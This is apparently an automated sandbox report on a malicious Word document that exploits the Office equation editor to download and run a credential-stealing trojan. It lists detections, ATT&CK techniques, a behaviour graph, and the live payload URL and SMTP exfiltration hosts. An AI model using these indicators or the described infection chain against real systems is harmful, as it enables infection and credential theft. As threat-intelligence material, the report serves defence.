                    Source: Yara matchFile source: 13.2.dzoihohj75439.scr.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.33de1e0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.dzoihohj75439.scr.3419a00.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.718610223.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.361580935.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dzoihohj75439.scr PID: 3456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: dzoihohj75439.scr PID: 3788, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: egFUHsL.exe PID: 312, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts121
                    Windows Management Instrumentation                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		21
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services1
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts33
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		111
                    Process Injection                    		2
                    Obfuscated Files or Information                    		11
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Install Root Certificate                    		1
                    Credentials in Registry                    		521
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Scheduled Task/Job                    		Login HookLogin Hook12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model11
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets151
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Modify Registry                    		DCSync1
                    Remote System Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1427896 Sample: Remittance 17042024.doc Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 66 Multi AV Scanner detection for domain / URL 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 17 other signatures 2->72 8 WINWORD.EXE 336 14 2->8         started        10 taskeng.exe 2->10         started        process3 process4 12 EQNEDT32.EXE 11 8->12         started        17 EQNEDT32.EXE 8->17         started        19 egFUHsL.exe 10->19         started        dnsIp5 64 covid19help.top 104.21.83.128, 443, 49161 CLOUDFLARENETUS United States 12->64 48 C:\Users\user\AppData\...\dzoihohj75439.scr, PE32 12->48 dropped 50 C:\Users\user\...\JBNvj66BwYU3yCv[1].scr, PE32 12->50 dropped 98 Installs new ROOT certificates 12->98 100 Office equation editor establishes network connection 12->100 102 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->102 21 dzoihohj75439.scr 5 12->21         started        104 Multi AV Scanner detection for dropped file 19->104 106 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->106 108 Machine Learning detection for dropped file 19->108 110 2 other signatures 19->110 25 egFUHsL.exe 19->25         started        28 powershell.exe 19->28         started        30 powershell.exe 19->30         started        32 schtasks.exe 19->32         started        file6 signatures7 process8 dnsIp9 44 C:\Users\user\AppData\Roaming\egFUHsL.exe, PE32 21->44 dropped 46 C:\Users\user\AppData\Local\...\tmp871B.tmp, XML 21->46 dropped 82 Multi AV Scanner detection for dropped file 21->82 84 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 21->84 86 Machine Learning detection for dropped file 21->86 94 5 other signatures 21->94 34 dzoihohj75439.scr 12 2 21->34         started        38 powershell.exe 4 21->38         started        40 powershell.exe 4 21->40         started        42 2 other processes 21->42 58 smtp.fshpxm.com 25->58 60 208.91.199.223, 587 PUBLIC-DOMAIN-REGISTRYUS United States 25->60 62 3 other IPs or domains 25->62 88 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->88 90 Tries to steal Mail credentials (via file / registry access) 25->90 92 Tries to harvest and steal ftp login credentials 25->92 96 2 other signatures 25->96 file10 signatures11 process12 dnsIp13 52 smtp.fshpxm.com 34->52 54 ip-api.com 208.95.112.1, 49162, 49165, 80 TUT-ASUS United States 34->54 56 3 other IPs or domains 34->56 74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 34->74 76 Tries to steal Mail credentials (via file / registry access) 34->76 78 Installs a global keyboard hook 34->78 80 Installs new ROOT certificates 38->80 signatures14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Remittance 17042024.doc45%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                    Remittance 17042024.doc46%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\dzoihohj75439.scr100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scr100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\egFUHsL.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scr71%ReversingLabsByteCode-MSIL.Trojan.LokiBot
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scr63%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\dzoihohj75439.scr71%ReversingLabsByteCode-MSIL.Trojan.LokiBot
                    C:\Users\user\AppData\Roaming\dzoihohj75439.scr63%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\egFUHsL.exe71%ReversingLabsByteCode-MSIL.Trojan.LokiBot
                    C:\Users\user\AppData\Roaming\egFUHsL.exe63%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    covid19help.top25%VirustotalBrowse
                    smtp.fshpxm.com1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    https://covid19help.top/JBNvj66BwYU3yCv.scr23%VirustotalBrowse
                    https://covid19help.top/24%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    us2.smtp.mailhostbox.com
                    		208.91.198.143
                    		truefalse
                      		high
                      covid19help.top
                      		104.21.83.128
                      		truetrueunknown
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high
                        smtp.fshpxm.com
                        		unknown
                        		unknowntrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://covid19help.top/JBNvj66BwYU3yCv.scrtrueunknown
                        http://ip-api.com/line/?fields=hostingfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://account.dyn.com/dzoihohj75439.scr, 00000005.00000002.361580935.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, dzoihohj75439.scr, 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            http://crl.comodocaEQNEDT32.EXE, 00000002.00000002.353617017.0000000003F20000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://covid19help.top/tVEQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://covid19help.top/JBNvj66BwYU3yCv.scrC:EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://covid19help.top/JBNvj66BwYU3yCv.scrjEQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedzoihohj75439.scr, 00000005.00000002.361137396.0000000002238000.00000004.00000800.00020000.00000000.sdmp, dzoihohj75439.scr, 0000000D.00000002.718610223.0000000002591000.00000004.00000800.00020000.00000000.sdmp, egFUHsL.exe, 0000000F.00000002.372430657.0000000002351000.00000004.00000800.00020000.00000000.sdmp, egFUHsL.exe, 00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://covid19help.top/EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.353617017.0000000003F2E000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr, 00000005.00000002.365439049.0000000006EFA000.00000004.00000020.00020000.00000000.sdmp, dzoihohj75439.scr.2.dr, JBNvj66BwYU3yCv[1].scr.2.dr, egFUHsL.exe.5.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://covid19help.top/JBNvj66BwYU3yCv.scrttC:EQNEDT32.EXE, 00000002.00000002.346682553.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.346682553.00000000006D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              208.91.198.143
                                              		us2.smtp.mailhostbox.comUnited States
                                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                              208.95.112.1
                                              		ip-api.comUnited States
                                              		53334TUT-ASUSfalse
                                              208.91.199.225
                                              		unknownUnited States
                                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                              104.21.83.128
                                              		covid19help.topUnited States
                                              		13335CLOUDFLARENETUStrue
                                              208.91.199.223
                                              		unknownUnited States
                                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                              208.91.199.224
                                              		unknownUnited States
                                              		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                              Private

                                              IP
                                              192.168.2.255

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1427896
                                              Start date and time:2024-04-18 10:23:05 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 9m 48s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:27
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Remittance 17042024.doc
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.expl.evad.winDOC@26/22@241/7
                                              EGA Information:
                                              • Successful, ratio: 80%
                                              HCA Information:
                                              • Successful, ratio: 96%
                                              • Number of executed functions: 170
                                              • Number of non-executed functions: 6
                                              Cookbook Comments:
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Active ActiveX Object
                                              • Scroll down
                                              • Close Viewer
                                              • Override analysis time to 76752.174438411 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                              • Execution Graph export aborted for target EQNEDT32.EXE, PID 3308 because there are no executed function
                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              01:23:58Task SchedulerRun new task: egFUHsL path: C:\Users\user\AppData\Roaming\egFUHsL.exe
                                              10:23:51API Interceptor287x Sleep call for process: EQNEDT32.EXE modified
                                              10:23:55API Interceptor1892944x Sleep call for process: dzoihohj75439.scr modified
                                              10:23:56API Interceptor7x Sleep call for process: schtasks.exe modified
                                              10:23:56API Interceptor78x Sleep call for process: powershell.exe modified
                                              10:23:58API Interceptor416x Sleep call for process: taskeng.exe modified
                                              10:23:59API Interceptor537542x Sleep call for process: egFUHsL.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              208.91.198.143SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                Fsd5TmAZfy.exeGet hashmaliciousAgentTeslaBrowse
                                                  April 2024 order Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                    TT Invoice copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      MT103.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        Transmiison Remit.exeGet hashmaliciousAgentTeslaBrowse
                                                          account details ptgd.exeGet hashmaliciousAgentTeslaBrowse
                                                            DHL-7654544CNT Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                              SecuriteInfo.com.Trojan.PackedNET.2794.21912.2151.exeGet hashmaliciousAgentTeslaBrowse
                                                                Prices.exeGet hashmaliciousAgentTeslaBrowse
                                                                  208.95.112.1yDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  dgxK76VlXC.exeGet hashmaliciousAsyncRAT, StormKitty, SugarDump, VenomRAT, XWorm, XenoRATBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  208.91.199.225Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                    Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                                      MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                                                        Transmiison Remit.exeGet hashmaliciousAgentTeslaBrowse
                                                                          Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                            euFL17ioCm.exeGet hashmaliciousAgentTeslaBrowse
                                                                              Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  Request for Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      us2.smtp.mailhostbox.comQuote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.223
                                                                                      SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.198.143
                                                                                      Cleared Payment.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.223
                                                                                      Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.225
                                                                                      Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.225
                                                                                      Fsd5TmAZfy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.198.143
                                                                                      MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.225
                                                                                      ReInquiry Lenght Error.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.223
                                                                                      ES502900012.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.224
                                                                                      April 2024 order Pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.198.143
                                                                                      ip-api.comyDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                      • 208.95.112.1
                                                                                      QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                      • 208.95.112.1
                                                                                      PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                                                      • 208.95.112.1
                                                                                      covid19help.topmsXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.21.83.128
                                                                                      BANK LETTER.docGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.21.83.128
                                                                                      You2bjAMeg.docGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.21.83.128
                                                                                      Arrival Notice.docGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.175.222
                                                                                      PO.docGet hashmaliciousRemcosBrowse
                                                                                      • 104.21.83.128
                                                                                      #1337.docGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.175.222
                                                                                      r29EHJocKX.rtfGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.83.128
                                                                                      aaaaaa.docx.docGet hashmaliciousUnknownBrowse
                                                                                      • 172.67.175.222
                                                                                      aaaaaa.docx.docGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.83.128
                                                                                      APMR1GTlQS.rtfGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.83.128

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      PUBLIC-DOMAIN-REGISTRYUSQuote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.223
                                                                                      SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.198.143
                                                                                      DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.222.226.100
                                                                                      Cleared Payment.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.223
                                                                                      Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.225
                                                                                      Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.225
                                                                                      SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.222.226.100
                                                                                      Fsd5TmAZfy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.198.143
                                                                                      SHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.222.226.100
                                                                                      MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.224
                                                                                      TUT-ASUSyDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                      • 208.95.112.1
                                                                                      QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                      • 208.95.112.1
                                                                                      PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                                                      • 208.95.112.1
                                                                                      PUBLIC-DOMAIN-REGISTRYUSQuote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.223
                                                                                      SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.198.143
                                                                                      DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.222.226.100
                                                                                      Cleared Payment.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.223
                                                                                      Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.225
                                                                                      Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.225
                                                                                      SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.222.226.100
                                                                                      Fsd5TmAZfy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.198.143
                                                                                      SHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.222.226.100
                                                                                      MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.224
                                                                                      CLOUDFLARENETUSdendy.exeGet hashmaliciousRisePro StealerBrowse
                                                                                      • 104.26.5.15
                                                                                      5Dw2hTQmiB.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.44.10
                                                                                      Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.26.13.205
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.44.10
                                                                                      Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 172.67.74.152
                                                                                      p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.26.12.205
                                                                                      https://ortelia.com/Downloads/Curator/CuratorSetup.exeGet hashmaliciousHavocBrowse
                                                                                      • 1.1.1.1
                                                                                      https://app.esign.docusign.com/e/er?utm_campaign=GBL_XX_DBU_NEW_2307_FreetoTrialUnlock_Email1AU&utm_medium=email&utm_source=Eloqua&elqCampaignId=29542&s=566810826&lid=32871&elqTrackId=1034fb987fd44c9a9a4d0833ff06a55d&elq=89d72859fe264966a0176d4309dbb1a6&elqaid=60251&elqat=1Get hashmaliciousUnknownBrowse
                                                                                      • 172.64.151.101
                                                                                      https://ortelia.com/download-ortelia-curator/Get hashmaliciousHavocBrowse
                                                                                      • 1.1.1.1
